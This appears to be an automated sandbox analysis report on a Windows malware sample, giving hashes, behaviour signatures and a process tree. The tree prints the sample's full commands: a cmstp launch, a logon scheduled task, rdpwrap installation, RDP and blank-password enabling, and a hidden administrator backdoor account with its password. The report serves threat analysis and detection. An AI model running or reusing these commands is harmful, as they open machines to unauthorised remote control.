Analysis
-
max time kernel
117s -
max time network
125s -
platform
windows7_x64 -
resource
win7-en-20211208 -
submitted
13-02-2022 15:28
Static task
static1
Behavioral task
behavioral1
Sample
11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
Resource
win10v2004-en-20220113
General
-
Target
11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe
-
Size
448KB
-
MD5
808189ade846e9d5855baed60727ee6e
-
SHA1
45a356565238d83b726852a4a69fa764a00c62f0
-
SHA256
11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855
-
SHA512
93542e23f5ffdb7bedc98b63595871d4da488d90e19e0e214de204ed11390bb61fddef239ebb51720372317da208a7aeab3d7783f5b426817a0b12993a6df010
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Executes dropped EXE 1 IoCs
Processes:
iv3yydjq.exepid process 1544 iv3yydjq.exe -
Modifies Windows Firewall 1 TTPs
-
Possible privilege escalation attempt 6 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exetakeown.exepid process 744 icacls.exe 1684 icacls.exe 1720 takeown.exe 1008 icacls.exe 1516 icacls.exe 1588 takeown.exe -
Sets DLL path for service in the registry 2 TTPs
-
Allows Network login with blank passwords 1 TTPs 1 IoCs
Allows local user accounts with blank passwords to access device from the network.
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0" reg.exe -
Modifies file permissions 1 TTPs 6 IoCs
Processes:
takeown.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 1720 takeown.exe 1008 icacls.exe 1516 icacls.exe 1588 takeown.exe 744 icacls.exe 1684 icacls.exe -
Drops file in Program Files directory 2 IoCs
Processes:
iv3yydjq.exedescription ioc process File opened for modification C:\Program Files\Common Files\Services\rdpwrap.ini iv3yydjq.exe File opened for modification C:\Program Files\Common Files\Services\rdpwrap.dll iv3yydjq.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 428 taskkill.exe -
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
iv3yydjq.exepid process 1544 iv3yydjq.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exepid process 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exetaskkill.exedescription pid process Token: SeDebugPrivilege 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe Token: SeDebugPrivilege 428 taskkill.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exeiv3yydjq.exepid process 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe 1544 iv3yydjq.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.execmd.exeiv3yydjq.execmd.execmd.execmd.exenet.exedescription pid process target process PID 744 wrote to memory of 1288 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe cmstp.exe PID 744 wrote to memory of 1288 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe cmstp.exe PID 744 wrote to memory of 1288 744 11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe cmstp.exe PID 1480 wrote to memory of 1544 1480 cmd.exe iv3yydjq.exe PID 1480 wrote to memory of 1544 1480 cmd.exe iv3yydjq.exe PID 1480 wrote to memory of 1544 1480 cmd.exe iv3yydjq.exe PID 1480 wrote to memory of 1544 1480 cmd.exe iv3yydjq.exe PID 1544 wrote to memory of 1764 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 1764 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 1764 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 1764 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 1336 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 1336 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 1336 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 1336 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 968 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 968 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 968 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 968 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 1696 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 1696 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 1696 1544 iv3yydjq.exe cmd.exe PID 1544 wrote to memory of 1696 1544 iv3yydjq.exe cmd.exe PID 968 wrote to memory of 1724 968 cmd.exe choice.exe PID 968 wrote to memory of 1724 968 cmd.exe choice.exe PID 968 wrote to memory of 1724 968 cmd.exe choice.exe PID 968 wrote to memory of 1724 968 cmd.exe choice.exe PID 1336 wrote to memory of 288 1336 cmd.exe schtasks.exe PID 1336 wrote to memory of 288 1336 cmd.exe schtasks.exe PID 1336 wrote to memory of 288 1336 cmd.exe schtasks.exe PID 1336 wrote to memory of 288 1336 cmd.exe schtasks.exe PID 1696 wrote to memory of 848 1696 cmd.exe choice.exe PID 1696 wrote to memory of 848 1696 cmd.exe choice.exe PID 1696 wrote to memory of 848 1696 cmd.exe choice.exe PID 1696 wrote to memory of 848 1696 cmd.exe choice.exe PID 1336 wrote to memory of 2044 1336 cmd.exe choice.exe PID 1336 wrote to memory of 2044 1336 cmd.exe choice.exe PID 1336 wrote to memory of 2044 1336 cmd.exe choice.exe PID 1336 wrote to memory of 2044 1336 cmd.exe choice.exe PID 1696 wrote to memory of 1720 1696 cmd.exe takeown.exe PID 1696 wrote to memory of 1720 1696 cmd.exe takeown.exe PID 1696 wrote to memory of 1720 1696 cmd.exe takeown.exe PID 1696 wrote to memory of 1720 1696 cmd.exe takeown.exe PID 968 wrote to memory of 1060 968 cmd.exe net.exe PID 968 wrote to memory of 1060 968 cmd.exe net.exe PID 968 wrote to memory of 1060 968 cmd.exe net.exe PID 968 wrote to memory of 1060 968 cmd.exe net.exe PID 1336 wrote to memory of 912 1336 cmd.exe schtasks.exe PID 1336 wrote to memory of 912 1336 cmd.exe schtasks.exe PID 1336 wrote to memory of 912 1336 cmd.exe schtasks.exe PID 1336 wrote to memory of 912 1336 cmd.exe schtasks.exe PID 1336 wrote to memory of 552 1336 cmd.exe choice.exe PID 1336 wrote to memory of 552 1336 cmd.exe choice.exe PID 1336 wrote to memory of 552 1336 cmd.exe choice.exe PID 1336 wrote to memory of 552 1336 cmd.exe choice.exe PID 1696 wrote to memory of 1008 1696 cmd.exe icacls.exe PID 1696 wrote to memory of 1008 1696 cmd.exe icacls.exe PID 1696 wrote to memory of 1008 1696 cmd.exe icacls.exe PID 1696 wrote to memory of 1008 1696 cmd.exe icacls.exe PID 1060 wrote to memory of 1736 1060 net.exe net1.exe PID 1060 wrote to memory of 1736 1060 net.exe net1.exe PID 1060 wrote to memory of 1736 1060 net.exe net1.exe PID 1060 wrote to memory of 1736 1060 net.exe net1.exe PID 1696 wrote to memory of 1516 1696 cmd.exe icacls.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe"C:\Users\Admin\AppData\Local\Temp\11c9544fc6c35f5488579168eb1953cb4d874c744dd97cc05fc0cfa5fa07b855.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\cmstp.exe"c:\windows\system32\cmstp.exe" /au c:\Users\Public\\qpcxh2bd.inf2⤵
-
C:\Windows\system32\cmd.execmd /c start c:\Users\Public\iv3yydjq.exe1⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\Users\Public\iv3yydjq.exec:\Users\Public\iv3yydjq.exe2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c mkdir "C:\Program Files\Common Files\Services" & exit3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks /create /tn "lst" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f & choice /n /c y /d y /t 3 > nul & schtasks /Run /tn "lst" & choice /n /c y /d y /t 3 > nul & schtasks /Delete /tn "lst" /f & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "lst" /tr "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs" /sc onlogon /rl highest /f4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn "lst"4⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /tn "lst" /f4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c choice /n /c y /d y /t 3 > nul & net user "Admin" " & reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & net accounts /maxpwage:unlimited & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\net.exenet user "Admin" " & reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & net accounts /maxpwage:unlimited & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "Admin" " & reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowFullControl /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSUserEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v fLogonDisabled /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v fAllowFullControl /t REG_DWORD /d 1 /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v CleanupProfiles /t REG_DWORD /d 99999 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v AllowDomainPINLogon /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & net accounts /maxpwage:unlimited & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v BlockDomainPicturePassword /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v LoggingEnabled /t REG_DWORD /d 0 /f & reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v EnableFIDODeviceLogon /t REG_DWORD /d 0 /f & exit5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c choice /n /c y /d y /t 3 > nul & del /f /q "c:\Users\Public\iv3yydjq.exe" & TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.ini" & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant "%USERNAME%":F & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant Administrators:F & choice /n /c y /d y /t 3 > nul & TAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.dll" & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant "%USERNAME%":F & ICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant Administrators:F & choice /n /c y /d y /t 3 > nul & net stop "TermService" /y & reg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f & choice /n /c y /d y /t 3 > nul & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f & reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f & choice /n /c y /d y /t 3 > nul & netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes & net user SysWOW64 t0or642531 /add /expires:never & choice /n /c y /d y /t 3 > nul & net localgroup Administrators SysWOW64 /add & net localgroup "Remote desktop users" SysWOW64 /add & choice /n /c y /d y /t 3 > nul & net localgroup "Remote desktop users" "Admin" /add & net start "TermService" & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\takeown.exeTAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.ini"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant "Admin":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeICACLS "C:\Program Files\Common Files\Services\rdpwrap.ini" /Grant Administrators:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\takeown.exeTAKEOWN /a /f "C:\Program Files\Common Files\Services\rdpwrap.dll"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant "Admin":F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeICACLS "C:\Program Files\Common Files\Services\rdpwrap.dll" /Grant Administrators:F4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\net.exenet stop "TermService" /y4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TermService" /y5⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\Common Files\Services\rdpwrap.dll" /f4⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LimitBlankPasswordUse /t REG_DWORD /d 0 /f4⤵
- Allows Network login with blank passwords
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes4⤵
-
C:\Windows\SysWOW64\net.exenet user SysWOW64 t0or642531 /add /expires:never4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user SysWOW64 t0or642531 /add /expires:never5⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators SysWOW64 /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators SysWOW64 /add5⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote desktop users" SysWOW64 /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote desktop users" SysWOW64 /add5⤵
-
C:\Windows\SysWOW64\choice.exechoice /n /c y /d y /t 34⤵
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote desktop users" "Admin" /add4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote desktop users" "Admin" /add5⤵
-
C:\Windows\SysWOW64\net.exenet start "TermService"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start "TermService"5⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {04D56997-B61C-41CA-AD2A-11402AF92322} S-1-5-21-2329389628-4064185017-3901522362-1000:QSKGHMYQ\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WScript.exeC:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs"2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.bat3⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SysWOW64 /t REG_DWORD /d 0 /f4⤵
Network
